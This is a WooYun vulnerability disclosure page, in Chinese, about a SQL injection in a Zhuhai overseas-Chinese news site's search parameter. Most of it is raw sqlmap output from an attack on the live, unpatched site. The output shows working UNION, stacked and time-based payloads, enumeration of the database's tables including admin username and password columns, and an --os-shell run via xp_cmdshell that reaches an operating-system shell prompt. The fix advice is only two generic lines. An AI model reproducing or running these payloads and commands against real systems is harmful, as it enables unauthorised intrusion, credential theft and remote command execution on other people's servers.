漏洞概要 关注数(0) 关注此漏洞
缺陷编号: WooYun-2016-196058
漏洞标题: 珠海侨网某处存在sql注入/可以获得shell
相关厂商: 珠海侨网
漏洞作者: 路人甲
提交时间: 2016-04-14 10:13
公开时间: 2016-05-29 10:20
漏洞类型: sql注射漏洞
危害等级: 高
自评Rank: 15
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系
Tags标签: sql注入
0人收藏
漏洞详情
披露状态:
2016-04-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-29: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
珠海侨网某处存在sql注入
详细说明:
code 区域
:/usr/share/w3af/w3af/plugins/attack/db/sqlmap# python sqlmap.py -u "**.**.**.**/searchshow.aspx?key=test%%27%20and%20%27%%27=%27" -t T_Admin --columns
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20160413}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:22:39
T_Admin
[22:22:39] [INFO] setting file for logging HTTP traffic
[22:22:39] [WARNING] it appears that you have provided tainted parameter values ('key=test%' and '%'='') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[22:22:41] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:22:41] [INFO] testing connection to the target URL
[22:22:41] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: key (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: key=test%' and '%'='' UNION ALL SELECT 19,CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(115)+CHAR(98)+CHAR(81)+CHAR(74)+CHAR(89)+CHAR(83)+CHAR(117)+CHAR(118)+CHAR(104)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(98)+CHAR(113),19,19,19,19--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: key=test%' and '%'=''; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: key=test%' and '%'='' WAITFOR DELAY '0:0:5'--
---
[22:22:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[22:22:41] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[22:22:41] [INFO] fetching current database
[22:22:41] [INFO] fetching tables for database: zhqw
[22:22:41] [INFO] the SQL query used returns 32 entries
[22:22:41] [INFO] fetching columns for table 'Choice' in database 'zhqw'
[22:22:41] [INFO] the SQL query used returns 5 entries
[22:22:41] [INFO] resumed: "choice","nvarchar"
[22:22:41] [INFO] resumed: "extends","int"
[22:22:41] [INFO] resumed: "id","int"
[22:22:41] [INFO] resumed: "IsDefault","int"
[22:22:41] [INFO] resumed: "num","int"
[22:22:41] [INFO] fetching columns for table 'Reply' in database 'zhqw'
[22:22:42] [INFO] the SQL query used returns 4 entries
[22:22:42] [INFO] retrieved: "contant","nvarchar"
[22:22:42] [INFO] retrieved: "id","int"
[22:22:43] [INFO] retrieved: "replytime","datetime"
[22:22:43] [INFO] retrieved: "tid","int"
[22:22:43] [INFO] fetching columns for table 'T_Admin' in database 'zhqw'
[22:22:44] [INFO] the SQL query used returns 11 entries
[22:22:45] [INFO] retrieved: "addtime","datetime"
[22:22:45] [INFO] retrieved: "AdminWrite","ntext"
[22:22:45] [INFO] retrieved: "bumenid","int"
[22:22:46] [INFO] retrieved: "czname","nvarchar"
[22:22:46] [INFO] retrieved: "jueseid","nvarchar"
[22:22:46] [INFO] retrieved: "phone","nvarchar"
[22:22:47] [INFO] retrieved: "roleid","int"
[22:22:47] [INFO] retrieved: "uid","int"
[22:22:47] [INFO] retrieved: "userid","nvarchar"
[22:22:48] [INFO] retrieved: "username","nvarchar"
[22:22:48] [INFO] retrieved: "userpwd","nvarchar"
[22:22:48] [INFO] fetching columns for table 'Title' in database 'zhqw'
[22:22:49] [INFO] the SQL query used returns 6 entries
[22:22:49] [INFO] retrieved: "choice","smallint"
[22:22:49] [INFO] retrieved: "current","bit"
[22:22:50] [INFO] retrieved: "id","int"
[22:22:50] [INFO] retrieved: "title","nvarchar"
[22:22:50] [INFO] retrieved: "typeid","int"
[22:22:51] [INFO] retrieved: "windows","bit"
[22:22:51] [INFO] fetching columns for table 'aboutInfo' in database 'zhqw'
[22:22:51] [INFO] the SQL query used returns 4 entries
[22:22:52] [INFO] retrieved: "aid","int"
[22:22:52] [INFO] retrieved: "neirong","nvarchar"
[22:22:52] [INFO] retrieved: "stypeid","int"
[22:22:53] [INFO] retrieved: "typeid","int"
[22:22:53] [INFO] fetching columns for table 'adInfo' in database 'zhqw'
[22:22:53] [INFO] the SQL query used returns 6 entries
[22:22:53] [INFO] retrieved: "aid","int"
[22:22:54] [INFO] retrieved: "ispass","int"
[22:22:54] [INFO] retrieved: "link","nvarchar"
[22:22:55] [INFO] retrieved: "name","nvarchar"
[22:22:55] [INFO] retrieved: "pic","nvarchar"
[22:22:55] [INFO] retrieved: "typeid","int"
[22:22:56] [INFO] fetching columns for table 'bumenInfo' in database 'zhqw'
[22:22:56] [INFO] the SQL query used returns 3 entries
[22:22:56] [INFO] retrieved: "beizhu","nvarchar"
[22:22:57] [INFO] retrieved: "bid","int"
[22:22:57] [INFO] retrieved: "name","nvarchar"
[22:22:57] [INFO] fetching columns for table 'classType' in database 'zhqw'
[22:22:57] [INFO] the SQL query used returns 6 entries
[22:22:58] [INFO] retrieved: "cid","int"
[22:22:58] [INFO] retrieved: "classname","nvarchar"
[22:22:58] [INFO] retrieved: "htlink","nvarchar"
[22:22:59] [INFO] retrieved: "lowerid","int"
[22:22:59] [INFO] retrieved: "pxid","int"
[22:23:00] [INFO] retrieved: "qtlink","nvarchar"
[22:23:00] [INFO] fetching columns for table 'config' in database 'zhqw'
[22:23:00] [INFO] the SQL query used returns 12 entries
[22:23:00] [INFO] retrieved: "ckid","int"
[22:23:01] [INFO] retrieved: "count","int"
[22:23:01] [INFO] retrieved: "webAddress","nvarchar"
[22:23:01] [INFO] retrieved: "webemail","nvarchar"
[22:23:02] [INFO] retrieved: "webFax","nvarchar"
[22:23:02] [INFO] retrieved: "webhomepage","nvarchar"
[22:23:02] [INFO] retrieved: "webKeycontent","nvarchar"
[22:23:03] [INFO] retrieved: "webKeycontent","nvarchar"
[22:23:03] [INFO] retrieved: "webname","nvarchar"
[22:23:03] [INFO] retrieved: "webTel","nvarchar"
[22:23:04] [INFO] retrieved: "webyoubian","nvarchar"
[22:23:04] [INFO] retrieved: "wid","int"
[22:23:04] [INFO] fetching columns for table 'dingyueInfo' in database 'zhqw'
[22:23:04] [INFO] the SQL query used returns 8 entries
[22:23:05] [INFO] retrieved: "addtime","datetime"
[22:23:05] [INFO] retrieved: "did","int"
[22:23:06] [INFO] retrieved: "laiyuan","nvarchar"
[22:23:06] [INFO] retrieved: "neirong","nvarchar"
[22:23:06] [INFO] retrieved: "pic","nvarchar"
[22:23:07] [INFO] retrieved: "title","nvarchar"
[22:23:07] [INFO] retrieved: "typeid","int"
[22:23:08] [INFO] retrieved: "userid","nvarchar"
[22:23:08] [INFO] fetched tables' columns on database 'zhqw'
Database: zhqw
Table: config
[11 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| ckid | int |
| count | int |
| webAddress | nvarchar |
| webemail | nvarchar |
| webFax | nvarchar |
| webhomepage | nvarchar |
| webKeycontent | nvarchar |
| webname | nvarchar |
| webTel | nvarchar |
| webyoubian | nvarchar |
| wid | int |
+---------------+----------+
Database: zhqw
Table: bumenInfo
[3 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| beizhu | nvarchar |
| bid | int |
| name | nvarchar |
+--------+----------+
Database: zhqw
Table: T_Admin
[11 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| addtime | datetime |
| AdminWrite | ntext |
| bumenid | int |
| czname | nvarchar |
| jueseid | nvarchar |
| phone | nvarchar |
| roleid | int |
| uid | int |
| userid | nvarchar |
| username | nvarchar |
| userpwd | nvarchar |
+------------+----------+
Database: zhqw
Table: dingyueInfo
[8 columns]
+---------+----------+
| Column | Type |
+---------+----------+
| addtime | datetime |
| did | int |
| laiyuan | nvarchar |
| neirong | nvarchar |
| pic | nvarchar |
| title | nvarchar |
| typeid | int |
| userid | nvarchar |
+---------+----------+
Database: zhqw
Table: adInfo
[6 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| aid | int |
| ispass | int |
| link | nvarchar |
| name | nvarchar |
| pic | nvarchar |
| typeid | int |
+--------+----------+
Database: zhqw
Table: aboutInfo
[4 columns]
+---------+----------+
| Column | Type |
+---------+----------+
| aid | int |
| neirong | nvarchar |
| stypeid | int |
| typeid | int |
+---------+----------+
Database: zhqw
Table: classType
[6 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| cid | int |
| classname | nvarchar |
| htlink | nvarchar |
| lowerid | int |
| pxid | int |
| qtlink | nvarchar |
+-----------+----------+
Database: zhqw
Table: Title
[6 columns]
+---------+----------+
| Column | Type |
+---------+----------+
| choice | smallint |
| current | bit |
| id | int |
| title | nvarchar |
| typeid | int |
| windows | bit |
+---------+----------+
Database: zhqw
Table: Choice
[5 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| choice | nvarchar |
| extends | int |
| id | int |
| IsDefault | int |
| num | int |
+-----------+----------+
Database: zhqw
Table: Reply
[4 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| contant | nvarchar |
| id | int |
| replytime | datetime |
| tid | int |
+-----------+----------+
[22:23:08] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'
[*] shutting down at 22:23:08
当前数据库各个表对应的段名,从表名就可以看到这个网站很多信息,包括config配置信息,bumenINFO部门信息,admin信息,ad广告信息,还有回复信息,订阅信息等。
当前用户为SA,sa是mssql的默认用户,是system和admin的缩写,具有mssql最高权限。
:/usr/share/w3af/w3af/plugins/attack/db/sqlmap# python sqlmap.py -u "**.**.**.**/searchshow.aspx?key=test%%27%20and%20%27%%27=%27" --random-agent --os-shell _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20160413} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.** [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 23:48:54 [23:48:54] [INFO] fetched random HTTP User-Agent header from file '/usr/share/w3af/w3af/plugins/attack/db/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/**.**.**.**' [23:48:54] [WARNING] it appears that you have provided tainted parameter values ('key=test%' and '%'='') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly are you really sure that you want to continue (sqlmap could have problems)? [y/N] y [23:48:57] [INFO] resuming back-end DBMS 'microsoft sql server' [23:48:57] [INFO] testing connection to the target URL [23:48:58] [WARNING] reflective value(s) found and filtering out sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: key (GET) Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: key=test%' and '%'='' UNION ALL SELECT 19,CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(115)+CHAR(98)+CHAR(81)+CHAR(74)+CHAR(89)+CHAR(83)+CHAR(117)+CHAR(118)+CHAR(104)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(98)+CHAR(113),19,19,19,19-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: key=test%' and '%'=''; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: key=test%' and '%'='' WAITFOR DELAY '0:0:5'-- --- [23:48:58] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2005 [23:48:58] [INFO] testing if current user is DBA [23:48:58] [WARNING] time-based comparison requires larger statistical model, please wait.............................. do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n [23:49:30] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [23:49:30] [INFO] testing if xp_cmdshell extended procedure is usable [23:50:12] [ERROR] unable to retrieve xp_cmdshell output [23:50:12] [INFO] going to use xp_cmdshell extended procedure for operating system command execution [23:50:12] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER os-shell>
漏洞证明:
修复方案:
采用权限最小原则
采取一些针对sql注入的防御方案
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
评价
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论